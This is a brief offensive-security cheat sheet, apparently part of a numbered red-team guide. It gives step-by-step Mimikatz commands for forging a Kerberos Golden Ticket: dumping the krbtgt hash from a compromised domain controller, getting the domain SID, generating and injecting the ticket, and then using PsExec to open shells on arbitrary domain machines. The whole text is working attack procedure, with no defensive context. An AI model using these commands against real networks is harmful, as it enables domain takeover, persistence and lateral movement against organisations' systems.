7. Golden Tickets



Generate Golden Ticket Locally Using Mimikatz:

  1. Get hold of krbtgt hash, e.g. by compromising DC and dumping NTLM with "lsadump::lsa /patch".
  2. Enumerate domain SID:
whoami /user
  1. Purge all existing kerberos tickets in Mimikatz:
kerberos::purge
  1. Generate ticket:
kerberos::golden /user:<golden-ticket-username> /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt-hash> /ptt
  1. Launch new command prompt:
misc::cmd
  1. Use PsExec to launch shells to arbitrary domain machines:
PsExec.exe \\<host> cmd.exe